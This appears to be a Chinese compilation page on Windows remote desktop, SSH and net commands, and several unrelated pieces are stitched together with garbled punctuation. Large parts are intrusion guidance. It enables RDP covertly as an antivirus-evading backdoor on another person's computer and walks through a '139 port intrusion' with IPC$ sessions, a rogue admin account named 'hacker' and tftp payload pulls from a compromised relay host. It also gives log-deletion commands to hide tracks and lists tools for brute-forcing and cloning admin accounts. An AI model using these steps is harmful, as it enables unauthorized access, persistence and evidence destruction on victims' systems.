如何命令行开启远程桌面

*** 作步骤如下：
右键"我的电脑"属性->选中远程->将"远程桌面"下的"允许用户连接到此计算机"©选项前的框选中，应用后确定。
点击开始后选择运行->输入mstsc命令并确定，输入IP地址，用户名和密码就可以进行远程 *** 作了。
当然这是开启3389端口比较正规的方法，今天无意间上网又学到一个方法，可以很隐蔽的通过命令行来开启3389端口，因为远程桌面服务是microsoft自带的服务，杀毒软件不会查杀，所以当做后门来用就非常方便了，而入侵一般都是通过命令行下来完成，前面的方法是在图形下，显然不方便，在命令行下输入：
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /F
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0
这样开启远程桌面服务后，你会发现 "我的电脑"属性->选中远程->将"远程桌面"下的"允许用户连接到此计算机" 变成灰色的了。不能修改了。这时可以去
在运行中输入gpeditmsc, 若NTFS 分区要有administrators的权限, 依次展开
本地计算策略---->计算机配置---->管理模板---->Windows 组件---->终端服务 双击允许用户使用终端服务远程连接, 把已启动改成未配制。
你应该是把这个改了，再改回已启动允许用户远程连接到此计算机 前面的那个勾就不会是灰色的

把以下内容保存成一个批处理，传到对方计算机里，再运行就可以了；当然你直接输也没问题。（注：限Win2003/XP）echo Windows Registry Editor Version 500>>3389regecho [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server]>>3389regecho "fDenyTSConnections"=dword:00000000>>3389regecho [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389regecho "PortNumber"=dword:00000d3d>>3389regecho [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389regecho "PortNumber"=dword:00000d3d>>3389regregedit /s 3389regdel 3389reg这是使用注册表的方法

如何使用mstsc进行远程登录？

对于大多数普通管理员来说，大家应当都使用过“远程桌面连接”工具（如下图），通过此工具你可以进行一些最基本的设置（如：显示屏的大小，颜色，本地资源的使用，应用程序的运行等等。），来达到远程连接的效果。

但对于一个有网络管理经验的人员来说，使用命令行来进行相应的管理可能是家常便饭，在这里向大家介绍使用MSTSC工具进行远程管理。在“运行”或“命令行”中你输入“MSTSC /”，将d出如下图窗口，在这里你可以了解到如何来使用它，如何去添加它的相应参数。

当你了解了他的具体使用方法和各参数的运用后，你便可以轻松的使用MSTSC命令来管理你远程服务器及客户端设备了。下面我简单举个例：

MSTSC /V:PNJX /ADMIN /F  意思是我要通过全屏方式管理SERVER服务器,运行完后将显示如下全屏登录画面。

默认配置
Windows下有很多SSH工具。在这里我是用的是Putty。如果安装了Git并配置使用Putty的话，就不需要另外在安装Putty了。使用SSH连接服务器的命令如下：
ssh IP地址1
一般来说为了安全性考虑，端口号等一些参数并不会使用默认值。这样的话命令就变成这样：
ssh 用户名@IP地址 -p 端口号1
如果连接成功的话会提示你输入远程服务器的密码。全部成功之后SSH就会显示远程服务器的提示符，这时候就说明连接成功了。
密钥登录
每次登录SH都需要输入密码很麻烦，而且可能不太安全。SSH还能使用另外一种登录方式，也就是使用密钥登录。这种登录方式需要客户端生成一堆公钥私钥对，然后将公钥添加到服务器中，这样下次就可以直接登录了。
首先生成SSH密钥，依照提示输入信息即可。默认生成在用户主目录中的ssh文件夹中。带pub的是公钥，接下来需要添加到服务器中。
ssh-keygen1
然后将本地公钥添加到服务器中，需要使用另一个命令：
scp -P 端口号 本地文件路径 用户名@远程服务器地址:远程路径1
然后登陆服务器，找到复制进去的公钥，将公钥名字改为authorized_keys并添加到对应的ssh文件夹中。然后退出SSH重新登陆试试，成功的话不需要输入密码就会直接进入远程服务器。

“Win+R”后输入“regedit”进入注册表编辑器，
直接定位到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\TestHooks
在右侧用鼠标新建个名为“ConsoleMode”的DWORD(32位)值，并将数值数据改成1。
然后重启电脑后，就会发现电脑是黑乎乎的一片，只有命令提示符。
需要按Ctrl+Alt+Del解锁后，才能开始输入之前的密码或PIN码进入系统，这里和之前的进入Win10系统的方式一样，账户密码需要回车进入系统、PIN直接输入即可

常用的DOS命令建立到远程主机的连接
net use \\ip\ipc$ "password"
/user:"username"
建立新用户
net user username password /add
修改用户密码
net
user username newpassword
激活用户
net user username
/active:yes
把用户加入到用户组
net localgroup groupname username
/add
查看远程主机的时间
net time \\ip
显示远程主机的共享资源列表
net view
\\ip
启动和停止系统服务
net start(stop) servicename
映射对方的硬盘
net use z:
\\ip\c$
启动程序
at \\ip time programnane
文件复制
copy filename
\\ip\c$\filename
远程执行FTP命令
echo open servername > c:\ftptxt
echo
username >> c:\ftptxt
echo password >> c:\ftptxt
echo get
filename c:\filename >> c:\ftptxt
ftp -s:c:\ftptxt
del
c:\ftptxt
删除日志
del c:\winnt\system32\logfiles\
del
c:\winnt\ssytem32\config\evt
del c:\winnt\system32\dtclog\
del
c:\winnt\system32\log
del c:\winnt\system32\txt
del c:\winnt\txt
del c:\winnt\log
访问对方共享资源
net use \\19216811\c$
/user:administrator "123"
如果提示连接成功,你在输入
start \\19216811\c$
就打开目标机的C盘了
----------------------------------
net use \\ip\ipc$ " "
/user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use
h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
net use h: \\ip\c$
登陆后映射对方C：到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del
删除映射对方到本地的为H:的映射
net user 用户名　密码　/add 建立用户
net user guest /active:yes
激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup
administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
net
start 查看开启了哪些服务
net start 服务名　 开启服务；(如:net start telnet， net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set
设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net
view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net
pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del
删除ipc$共享
net share c$ /del 删除C：共享
net user guest 12345
用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a
查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况，常用netstat -an
netstat -v
查看正在进行的工作
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip
对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
tracert -参数
ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
ping ip(或域名)
向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
ping -t -l
65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows
NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
tlist -t
以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
kill -F 进程名
加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
del -F 文件名
加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR
”表示删除当前目录下所有只读文件，“DEL/A-S ”表示删除当前目录下除系统文件以外的所有文件
#2 二：
del /S /Q 目录
或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除 *** 作时的系统确认就直接删除。（二个命令作用相同）
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc
onetxt twotxt > 3sttxt 对比二个文件并把不同之处输出到3sttxt文件中，"> "和"> >"
是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
at
id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r
在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口
远和登陆服务器,默认端口为23
open ip 连接到IP（属telnet登陆后的命令）
telnet 在本机上直接键入telnet
将进入本机的telnet
copy 路径\文件名1　路径\文件名2 /y
复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srvexe \\ip\admin$
复制本地c:\srvexe到对方的admin下
cppy 1stjpg/b+2sttxt/a 3stjpg
将2sttxt的内容藏身到1stjpg中生成3stjpg新的文件，注：2sttxt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
copy \\ip\admin$\svvexe c:\ 或:copy\\ip\admin$\
复制对方admini$共享下的srvexe文件（所有文件）至本地C：
xcopy 要复制的文件或目录树　目标地址\目录名
复制文件和目录树，用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get serverexe
c:\serverexe 登陆后，将“IP”的serverexe下载到目标主机c:\serverexe
参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
tftp -i 对方IP　put
c:\serverexe 登陆后，上传本地c:\serverexe至主机
ftp ip 端口
用于上传文件至服务器或进行文件 *** 作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
route
print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway
addres，接口地址Interface
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp
-a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
mem
查看cpu使用情况
attrib 文件名(目录名) 查看某文件（目录）的属性
attrib 文件名 -A -R -S -H 或 +A +R +S
+H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
dir
查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
date /t 、
time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
set
指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符)
显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序，并显示出：请按任意键继续
if
在批处理程序中执行条件处理（更多说明见if命令及变量）
goto 标签
将cmdexe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
call 路径\批处理文件名
从批处理程序中调用另一个批处理程序 （更多说明见call /）
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo
信息 >> passtxt 将"信息"保存到passtxt文件中
findstr "Hello" aatxt
在aatxt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值
设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmdexe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
139端口入侵
net
命令是139端口入侵的重中之重，整个入侵过程会多次用到它。在命令行窗口下输入net，可以看到有一大堆参数，别被这一大堆参数吓怀了，现在我来为你一一讲解。
net
use
net use
命令用于与远程主机建立IPC$(管理)连接，当你有远程计算机的用户名(通常用户名为administrator,记住它)和密码时，在命令行窗口下输入net
use\\IP\IPC$"password"/user:administrator，你就成功地建立了与远程计算机的连接。在这之后，可以对其进行管理了。net
use 还有一个用处，即映射远程机器的共享资源，输入net use z: \\IP\C$
(注意！在此之后的一切命令都是基于第一个命令的，也就是说必须先建立IPC$连接后，这些命令才会成功)，打开“我的电脑”，你会发现多了一个Z盘，里面全是远程主机C盘下的东西，你在Z盘里删除了一个文件，对方C盘下的这个文件就也被删除了，所有对Z盘的 *** 作其实就是对远程计算机的C
盘的 *** 作。怎么样，是不是很有意思呢？
net view
net view 用于查看远程计算机有哪些共享资源，通常你会看到my
document之类的共享文件夹，输入net view \\IP即可。我个人认为net view
没有太大用处，要知道，在Windows2000中，各个硬盘都是共享的，但是如果你用net view 来查看，你会发现并无C,D,E
之类的共享资源。这是为什么呢？注意，在这之前的一些命令中，我们曾输入过IPC$,C$这样的奇怪东西，其实，Windows2000中，带"$"后缀的共享资源是隐藏的，在命令行窗口下是无法看到的，Windows2000中各个盘都是以诸如C$,D$,E$
这样的名称共享的，所以我们看不到，但确实存在，IPC$也是如此。
net share
net share 用于开放共享，输入net
share QQ=c:\tencent，你会发现多了一个名为QQ的共享资源。这个命令有慎么作用呢？假设一个主机安全做的不错，关闭了IPC$,C$,D$
等共享，那么我们就无法在139端口上建立管理连接，也无法访问对方的C盘，当我们通过别的手段进入后(如远程溢出)，我们就可以用net share
开放IPC$，从而转为熟悉的139端口的入侵，开放IPC$ 的命令为net share IPC$。相应的，如果你想关闭共享，你可以加上/del 后缀，例如net
share c$ /del 就关闭了C盘的共享。
net user
net user 命令用于管理主机上的用户，仅输入不带任何参数的net
user 会列出计算机上所有的用户名。现在就让我们看看net user
命令是如何对用户进行 *** 作的。
　┎───────────────────────────────────────────────────────┒　
　┃
net user hacker 12345 /add 建立一个名为hacker，密码为12345的用户。　
┃
　┃ net user hacker /del
删除名为hacker的用户。　┃　
　┃ net user hacker
/active:no 禁用hacker这个用户，这个用户不能再登陆此计算机。　┃
　┃ net user hacker
/active:yes 激活已禁用的hacker这个用户。 ┃　
┃ net localgroup
administrator hacker /add 把hacker这个用户添加进管理员组，即提升hacker的权限，使之变为管理员 ┃
┖───────────────────────────────────────────────────────┚
net start /
net stop
net start / net stop 命令用于起动/停止系统服务，通常我们会net stop w3svc
(停止网页服务)，然后替换网页，对此命令我不多讲，知道即可。
　 at 命令，net
time
之所以把它们放在一起来讲，是因为at命令要用到net time命令的结果，一般我们先 net view
\\ip,得到远程主机的时间(假设得到的时间为9:00)，然后at \\ip 9:00 telnet
就启动了telnet服务，at这个命令就是用来远程运行程序的
(5)需要准备的工具
　肉鸡猎手v10扫描一个网段，找出弱密码的计算机
　SMBCrack
针对特定主机，暴力猜解密码
　DameWare Mini Remote Control监控运程屏幕　
　CAexe
克隆管理员账号

1安装ssh服务 (SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议)
2打开命令行窗口,使用ssh远程连接(win+r,输入cmd) 命令输入的格式为:ssh name@192168210 这里的ssh是告诉系统,我要启用ssh命令

---